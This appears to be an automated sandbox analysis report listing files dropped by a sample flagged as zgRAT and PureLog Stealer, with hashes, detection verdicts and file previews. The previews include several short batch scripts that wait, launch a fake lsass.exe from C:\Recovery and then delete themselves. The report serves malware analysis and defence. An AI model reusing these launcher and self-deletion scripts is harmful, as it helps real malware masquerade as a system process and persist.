Category:	dropped
Size (bytes):	884
Entropy (8bit):	5.9152465044215745
Encrypted:	false
SSDEEP:	24:1rKeqc3B2aOMtpsFu0iRf38sPQNZw8TnC:gen3dOMtpTRf38ZNiiC
MD5:	26A745749B4520ABD38A62353AFA44B7
SHA1:	47A42F5DE1E8EAEC4EC9995205023E4DBE1DD641
SHA-256:	80A64CB267F24BB8BEADAF46B416C0CAE36A35D70B0E9DEC5EC790704900B0C1
SHA-512:	DE7C4017C6977718B9FF696D97F79CE774A7F5D9E48E3EEB843EAEB1AF400243795C93FB9660619C85738278EABAD5238682F101AF5C7F6EDB535C454EED6FE4
Malicious:	false
Preview:	YazNdwzT4FK5NEYD3c1olVr9JWxlSlMN4nKFlOV3e377dtTU3LpGEQRDs0EH8NAT27Aj3ScoG7JsXtfZCcrG6GJoWGWvKO5Q2oFgtubktAAGHjp9UoFfg3XwyWNx5rd2B2zto9pSBHX5GCgwbXafIau8RTrXgnoChIEPt6UV8xdZgbqvzbWiQ8tlH1cVRSvYcVY78RDeCEhV7Vbzm6iFRGvjYdH1e9EqBF6KDsxhX1fMaXovZmsVtqGVkzieKLADA0T1ZRv4IBrakjIAyWc1Rs6U9lkOJSXM0cLjDwWI0yMs9puBqiqytIvS492xqhuzofjIYi7C9TAdgNVT0jhlmjdsq2pE3ibTDXEdGmnIknyZHSvqnj7H9JMEC1bf22Ia2raJJ1NO5ZA8uDkYG8bUlUU3K9bPKIPsfXha2mhvWsLkIOU8QDY3byziWg8JZ8ExJRdXgKfdbp82Iuu5pd8GuVRqi9DWnXWXoYa1u7cGi4cw06ZmvCd697DxAwzgGJ0DTkNtT3LsA2iz3f0ljbkk3ZYrUm07I59YEYdQtpS21v5HZN4f6N7pjPK3LgYrCOkF2JveCk23IstIdRSHrVA48UzzOjEMRlznK0OPbZcWVDg1fBZ4OR9rNqHiU6Qcfpmh2G7mDCqR2oi4x8TMJK89mHaetp5eJ91qb98ZEw0LlryiHMuWnDTUrm4upc3XHLI3x2dy94IWTwY4T1Wg5j1Gqg9yENtl3dEaj5vPt6Ws47B4O9byGWciTCNQ3otvKhd0s8VYFHx8MILtfEjEw5egAfGgsfWEMkiWdKLQoCs9jdVK0dvyFo8PD6zM1yqkuswlkzPU3TatMf6hJ5qOti9hlSThV9YzWIO1rukBOa5vOPDh9SC5Ic0M

C:\Recovery\lsass.exe

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1916928
Entropy (8bit):	7.5383466252302025
Encrypted:	false
SSDEEP:	24576:xTkCAuXonymsrxQZgTOXw0iMyWU2FYEUhBpph/ukrhgSUkInLoA7JkXuTZSjAkDP:JJrx6sOXg8ghhfCSUkIkA7JkUZkuyiT
MD5:	BD5DF5DC5869453A2501A80C6FC937F4
SHA1:	CE691012B4A2A0D75DFB74D54F4F61AB6194FF91
SHA-256:	C7C51C52D0201DECD12006C38608E5E3C935708F5D5014268095040BFAE4E479
SHA-512:	F1A09D8691E0FB0185D14D34BBD664F60D0C3CE4C91D5AD8FCEAEA98F47B4CEC9394DEF0EF081D24A422EF15C55E2D5DDCD14AE65AFB1DE6986735398100EA7D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\lsass.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 83%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.................8...........W... ...`....@.. ....................................@..................................V..K....`.. ............................................................................ ............... ..H............text...$7... ...8.................. ..`.rsrc... ....`.......:..............@....reloc...............>..............@..B.................W......H.......T...$...........x....t..LV.......................................0..........(.... ........8........E....\...)...8.......8W...(.... ....~....{....:....& ....8....(.... ....8....(.... ....~....{....9....& ....8........0..'....... ........8........E....~...........U...............8y...8.... ....8........~....(Z...~....(^... ....<W... ....~....{\|...9....& ....8....~....9.... ....~....{....:l...& ....8a...8.... ....8R...r...ps....z~....(R... .... .... ....s....~....(V...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ComponentBrowserruntimeHostNet.exe.log

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1179
Entropy (8bit):	5.354252320228764
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mM:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHK2
MD5:	074445AD437DEED8A22F11A846280CE2
SHA1:	23025D83D7C33396A5F736FC6F9945976CFCD5D1
SHA-256:	B7FD27029E12BE3B5C2C4010CC9C9BCB77CFE44852CC6EF4C3CED70740BB1CFD
SHA-512:	440F8E77340A5C2F64BF97BC712193145F03AEDB86C0F5C849CA1AD0190E5621DDD7AE8104862383E31FFEC49CCF483CF2E4533C501B2606EE1D0FE66E865B6D
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	5.370675888495854
Encrypted:	false
SSDEEP:	48:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKlT4v1qHGIs0HKD:iqbYqGSI6oPtzHeqKktGqZ4vwmj0qD
MD5:	5ACBB013936118762389287938AE0885
SHA1:	12C6B0AA2B5238E3154F3B538124EE9DB0E496D6
SHA-256:	28E292538199310B7DA27C6C743EFD34E1F806D28611B6C9EF4212D132272DEF
SHA-512:	E803C699BE7FC25FF09D1DEE86412CE8F18834E22E20B7D036323B740891A64B2CE33D0E0BD075178F0B6F496BA9CFBF7EF1A0884FE5E470C8CCF6D824891C77
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Temp\2JnastWSjL.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.078850941138945
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAItL/Ry2RMHn:hCRLuVFOOr+DE7vvvKOZG1wkn23fttl4
MD5:	E880C505EE24C8430777C8EC5AF66187
SHA1:	0CFB0AA38B40CAFED7137A8E82F0AEC3EE00E9D3
SHA-256:	94A88D2AF2C69D35E75791588A999A438D3D48856523CE2B2B510898C3BFD99D
SHA-512:	A3AA9C081BD013E4E4734114722C77E00BEE9B4171285681C8BB0FC60FFF282EFB4BAF17B1ACA4F15461193F4FC8A7A87C93E3D6BA2521AFBBB79E480E08E78A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2JnastWSjL.bat"

C:\Users\user\AppData\Local\Temp\2juDPxCKYX.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.099390303652712
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fNQeq:HTg9uYDE7vrfbq
MD5:	34DF364311C2FC8CD221D7BE5F3ECA7A
SHA1:	62E582518F0CC4F5FE302355703EC1933EB40062
SHA-256:	641DAF5AA340FC9D2437BAAE6BB23634B6F778CA3EF3BBB5621D957FB62285F7
SHA-512:	7D589D95DD0F69D34907DDAC4454E77A25E676C7B9FAF85D700771062EDFC1E42292B2F0C705BF4860A52EB52F17B8A890FCD9820D0D961AE01D5AEC1B87E0BB
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\2juDPxCKYX.bat"

C:\Users\user\AppData\Local\Temp\5Fkn6foGzf.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.090632927971037
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIvK5Hn:hCRLuVFOOr+DE7vvvKOZG1wkn23fS5H
MD5:	5241898FBA555EEA22F23B4CDB30F70F
SHA1:	D878FB8442031ED76806D59E3F9CF7D39B8F60C4
SHA-256:	89D587E4DF30E3F98E8D0DD0228EFE40961F051E9FA1B76432B29026218248C3
SHA-512:	ABBF2FF3FAA8C639D6888766FE66690DF19A305F21393BC1DD7320017C9CFC339E52468B38A56029BD8836FE216EE4D95447453338533F75F5FA25A891635375
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5Fkn6foGzf.bat"

C:\Users\user\AppData\Local\Temp\5tk1CddJ7G.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.10840549143363
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIZvSizK:hCRLuVFOOr+DE7vvvKOZG1wkn23fZ5zK
MD5:	B27BA11B8E96A1C26A23DD8AEC848486
SHA1:	95A108DAC79B4C6D0484280BC0860B563B697829
SHA-256:	9626E2A1505DD1F8DC536804F63891ADB289728F9C482993C22EC9E3F144D394
SHA-512:	8ACFD261B2740A00A15027A5A5719444C7B6CB4262377E5497B33CFFBB053FFDA531993AB65519C6DE98EAFE022549B7BEDED5B0E54AA8D60E9D3961B61E2574
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5tk1CddJ7G.bat"

C:\Users\user\AppData\Local\Temp\6973u7blL4

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.4838561897747224
Encrypted:	false
SSDEEP:	3:bLqMmLTj01zn:nqM+0x
MD5:	019371CE95C868CE12F1692784C44974
SHA1:	3FB1F1BA100120627180E3F6F34E99FFCB955A7F
SHA-256:	B097E79B17ACDF86394649B5F0451EA042AF2BA11C344E786AE1010AD77BEAE0
SHA-512:	08D37D58DFA343EBC3728861FBA567414CF0420DE13ED3E21239E2E18351D3E9BCD86DADB6ADF08BE7D40DB217F946E60FB8E021C92CCEEF1E8484F01CB1EB1D
Malicious:	false
Preview:	s9dIecXYkACn68DI2rcyK5PNB

C:\Users\user\AppData\Local\Temp\D7zq4mxcPE

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:hUKCj8V3JVn:VCj8djn
MD5:	F1E1D15FB95CB93E628F7095830D3B3E
SHA1:	C37BCA0BB5B2316697FE4BAED781DAC48E684A53
SHA-256:	A5E744E684A270F04BA291C1379C243B8A469894E8BEAC728776D206A4E87DA5
SHA-512:	73BE003DA61D3458EABBF42F2CAE4E928321C7177E356BF8D297142408C7C17C5820E632CC9076F3A435D545A450970776372B5C55355A583E0DEF9167F0D2B4
Malicious:	false
Preview:	xu7bhBK9r3o2wTG5xYpRlKgus

C:\Users\user\AppData\Local\Temp\EU3LD70Oqh

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:p/e2G7V:67V
MD5:	E49928651513704319560F22D272DF11
SHA1:	7A910F4914C9910C1EA72662A220134498687D41
SHA-256:	F6F4C0670A95A35BD288401C3B709C0D10E7D712D4EA4520587829C4B184FCD2
SHA-512:	20788615CB8E2F80A14EFAAC1E721D2AD8994899E91DE9B42B38FD011A38C050FD75C57B1F44C404BA6FB1259D2B3B24DF3E980D035C6BC09925BE7CE2108745
Malicious:	false
Preview:	DBKQIXk89SYjvQDzYLYxCygr0

C:\Users\user\AppData\Local\Temp\GCUAVo4aG3

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:kw4XxLvr:5axLvr
MD5:	57925106733316037B4E69FD20D27C33
SHA1:	20399F4DF7DE552DFF02445FE765D3D0D5FF6578
SHA-256:	723BB03FBAFF24A2DC4A4989B682B7425930E8AA5F62B4303996781A2D0C7ACA
SHA-512:	F22D31F1E42541EA23D91425B2213C80FC16BFE916A9895B5F3516A77E4E5AEBDA2EC54DC70CEC23D8112BF1218C6FC70B8D740CC69FB438939279C78FF3C306
Malicious:	false
Preview:	jGZof3ztUylrp7YJvJRK6Mtes

C:\Users\user\AppData\Local\Temp\Jis7YXjQcY

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.453660689688183
Encrypted:	false
SSDEEP:	3:UQeWINNn:J/Cn
MD5:	ECF60AAC9B88DAA9F173C1AF56D1BE56
SHA1:	1F785A17375DBD4E52E511B5B5B7B519B64C27DD
SHA-256:	0190558C42A0E34888BEFB093B1625D7AC5CDBC2ACC1E7FEDF763FCB6B146019
SHA-512:	591ACD15E327919E9FB08697AEDA0D0CF3DE09ADA97C04A030EADA47C9D6515AC2566A5311236035819E83DFDDA4B96B4FE584905BAF025595BED2260C0C72FC
Malicious:	false
Preview:	TaPJ5JsuJUQe8KyOkXCM0hq1B

C:\Users\user\AppData\Local\Temp\OOvkeHfEc2

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:/pUrJEQBW:h4J58
MD5:	D68D766256D1B5E66F6594A0F7568191
SHA1:	00F292D40AAC33D3986868F05A90CCC69F43A087
SHA-256:	8F094155C106C95241094B39D5F1174D652EC76AABB73DC6F2986B9C598D3C40
SHA-512:	81B706B9917AB50EE24F3A99AFD9674D7CE933D8B72B0B8418469FF49A9E29AB3CA5B980A4E42D7DE021BB0AB0456C66950C12B76C8F6B7F72FE94A77B2AB17E
Malicious:	false
Preview:	rOqL1SoRtHfI5LNau5N6G8Ema

C:\Users\user\AppData\Local\Temp\PYXjnnJpCg

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:mrxyXSgSc:mxc
MD5:	012D93023A8B1DFAC5B573118EBC2255
SHA1:	1CCD0C662D67688A6E130F05EA19A357C9678E58
SHA-256:	DCB8D733DAAA742FCA3604D024E166D2F51D9C573784376FC3225780BDD5D946
SHA-512:	D246C3F61A051FE4DBDCE5ADE05D80C40E0C20829A6459E5DFFE793965B9532A020272D8CD2F16198B9176423B67F5F3F1A2102299E4B48148895C5527B7E6ED
Malicious:	false
Preview:	DwjNsZYfNLzwEYrwn1Zj5Nhob

C:\Users\user\AppData\Local\Temp\PdP1UB7pUq.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.1000490317166065
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAI7R:hCRLuVFOOr+DE7vvvKOZG1wkn23fN
MD5:	C3BB83CB53AA2D4F040BC6A55A2D8693
SHA1:	570BBBD7C281AB5CB506E7BC9F92113116CAB085
SHA-256:	DA515CD70E9A07E65846854BB9827CE7C6DDB72DF95DDFA861A2F66460B6D1F9
SHA-512:	74D11DA0522F6B65FA558FCF5D644A2D64F1F674C595250E290113C44DF20538E78C6B577AB9D9F5A036C64370BA76D67A86B23F61C330CF56941713361B7BD0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\PdP1UB7pUq.bat"

C:\Users\user\AppData\Local\Temp\TEZ3NyskMn

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:oxK/10ux:oxk+ux
MD5:	1652217EA06BF080F5F65A4505E1B3F6
SHA1:	ACD6BC928E29CD510FE275765A00CC30CBFD7614
SHA-256:	F199DEC07178EC254A4C14C8A5B8ED97A3006B1B0BC374F3563FCA80B14CBF08
SHA-512:	5A3D93371776A7CD855CBFF9DFF4962331202456215BA18FE8A6E37EDFDC4F99F9097D8CC4C1092E59ED036097985B60C83F74A771B19A2B561E7EDC89F53D70
Malicious:	false
Preview:	AJhCD0K87z5UxrZd4PQ1RSSRr

C:\Users\user\AppData\Local\Temp\TqMgut2j0M.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.064697578494658
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fNH:HTg9uYDE7vrf9
MD5:	4454C7D96B86C66D96A442EDB51963D6
SHA1:	1020160AFF9BA8E533B78CF5D30E485CA76AB822
SHA-256:	03401137CE4D4269AE008723AF6FFEAD4CA19302A6D25DDB8B9D9A6E1F33C3C5
SHA-512:	A270DCBFAB534ED07598AAC3BDF556E44B4618208550A8E6B28665AD86FC4792DF06A4ED9088946B134C469CAA2EED74A8A29C493DB406437144B27D8A232FF6
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TqMgut2j0M.bat"

C:\Users\user\AppData\Local\Temp\VcoWQoOVKa

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601645
Encrypted:	false
SSDEEP:	3:HUNinzLA+7n:HMinzLA+7
MD5:	FFE21E81A346803A96BAB608EDCB140B
SHA1:	B005CDEDE598F7EE25FB7BFA58D4DCBBBEEE3730
SHA-256:	832C86C39908BD5ADA00D1BF3C5809D01B187B37FA9F50C4D0E322C7EC81AE11
SHA-512:	9084BBB989448EC5B494B34A4DF1964AE13059B858B393D2AE66270198742507AE585843BF67B536DF1918E95037EAF45931678B448AC63D5E10EAE639487244
Malicious:	false
Preview:	sC4x3lOaBeyY1XKESnY4V4ySy

C:\Users\user\AppData\Local\Temp\dv8cCFDVxH

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774723
Encrypted:	false
SSDEEP:	3:CNchvB:CkB
MD5:	2964126A61C3C68B61C9D79A07F60952
SHA1:	5A362C0FE0C32B856D1D7B5100EA7E3A70CE165E
SHA-256:	E57342202AC85B71D54AAE7D9267ABAC47BF7681949877F1CD27C11F90C488A7
SHA-512:	03EE543C356F563DC5B7308805F7D17023F42D16E83D8953019F6B4A8C425E1B9C9FDD4795719D97B22A2B3F6B2463BE44A5F1E5DCB05EE88CEA3B8AE16043CD
Malicious:	false
Preview:	txc3oOB6ybnI76OrckpLdpLM9

C:\Users\user\AppData\Local\Temp\hR2MTpBDVc.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.063052661540674
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fIxNcG:HTg9uYDE7vrfAX
MD5:	C1C496085E636EDA547612A535D9A0C9
SHA1:	F47E88383C0D5906BFE72EFC98D52844F8949872
SHA-256:	6E65221DFDD26A4FD17F3D6748B65054C070363125A9193023916122073DC6FF
SHA-512:	585786419DBF76C1947A718E5BA30893973C5463B4ED98C5D6A4AF41F9F39E635B3B9D3D3C74D65BFAF3B698641686E0C520474B57DE3DA2C32559E52D44C266
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\hR2MTpBDVc.bat"

C:\Users\user\AppData\Local\Temp\jUHUXwf87c.bat

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.1219832604692295
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIKb1LHEh:hCRLuVFOOr+DE7vvvKOZG1wkn23fgK
MD5:	955EBCA762F9346743BBF41C0AA48861
SHA1:	9D81AF8CFC2CDF05346F566A8CF981E0362BD65B
SHA-256:	F129E0296E9F15BE7D0A9CA458027515AEBCE378B6F107EA34F286FEC29850FA
SHA-512:	45686673A2033736F9B3B0887B39B431229147734870920B83954A01D3AD664DE75C45ED6B02FFD9A4934416EFEA21F4E0B05E7E05CB2AC331A2BD88C3B7147D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jUHUXwf87c.bat"

C:\Users\user\AppData\Local\Temp\nhkbaghNki.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	149
Entropy (8bit):	5.062573804028863
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m7vEvIvBktKcKZG1t+kiE2J5xAI79H:hCRLuVFOOr+DE7vvvKOZG1wkn23f7l
MD5:	34502D4556D04B98C8375E6496ECC131
SHA1:	1A2C03CF89DE8F66B50F0DE89C108CBB26564651
SHA-256:	79A98FCD1A811321E3B57F45E46746F65677E14F4F9F541B190BCBE8A550B501
SHA-512:	F9CB0A156A44A6584E392AB5519C89AE7C456197C4B90FEF70E7FF7443290301BFB285CB455B29DA672963175F7B1F9DE6E1AC427A1F5493271164C1B4589DE1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\nhkbaghNki.bat"

C:\Users\user\AppData\Local\Temp\ox2WAuZgXg

Download File

Process:	C:\Recovery\lsass.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774723
Encrypted:	false
SSDEEP:	3:FpST3cfjAk:HSa
MD5:	92FCF7F5EB5EC1423C6FB3908C608390
SHA1:	3CC0CE3A956EC910CB32089C75FD8466362E7AEC
SHA-256:	CBAF1F04DC840F1ACAB4AE77457945B6B6499E85AA5F3428F81561E05A29B5EF
SHA-512:	36C9C5B62CBF49EDAAA1C24DDFDD8A37342FF770D82FAB98558913D143125FE35F235B78E6FA1457C114B804762D16516238B4FDB46E054DBE91E8C70D6C62CC
Malicious:	false
Preview:	tOaU9wsqqKyXB6bVxFOWKvP6A

C:\Users\user\AppData\Local\Temp\qoP5fBU7F9.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.096497895786488
Encrypted:	false
SSDEEP:	3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9m7vEvIvBktKcKZG1t+kiE2J5xAIi:hCijTg3Nou1SV+DE7vvvKOZG1wkn23fi
MD5:	CB70F0CA31CFF45F75CE941678D937B7
SHA1:	A798105B728FE4AD17D5CFA736EAEE4C2AA438AF
SHA-256:	1D97F8EC22134EDA2210DF95DCA15DA7DD9BDCA5E42428E466413C254FE29654
SHA-512:	E2669177FD2B695413F9E1390567E09FBF96D1A95A33ED5E9C651DD7C90F73F67E603FA23533AE891031AAA690311FDDAAC677B183A1EDA979AC19CBF4E7DA64
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qoP5fBU7F9.bat"

C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat

Download File

Process:	C:\Recovery\lsass.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	197
Entropy (8bit):	5.012805098664586
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE7vvvKOZG1wkn23ft4:HTg9uYDE7vrfS
MD5:	25742114222CCB1DED29CDFD2BC1477A
SHA1:	84E4A12FFE16506FDA1E7D96B8D55233803F3040
SHA-256:	62B0C13B3D2981F6E24EB53777D4AE7A10F93F6EEB62C37FD57E4884D0790323
SHA-512:	E78B4B2A3971F5E414FCFA1B7DB38A0BBDB4B4D23EF860268366E6D9E18BA3337AC9EDAC870675B025828C634D8DD2F1A496C83742F4DB458E20F14711E38222
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Recovery\lsass.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\riciCmDgnt.bat"

C:\Users\user\Desktop\AFUvvHdz.log

Download File

Process:	C:\HypercontainerServerhostDll\ComponentBrowserruntimeHostNet.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
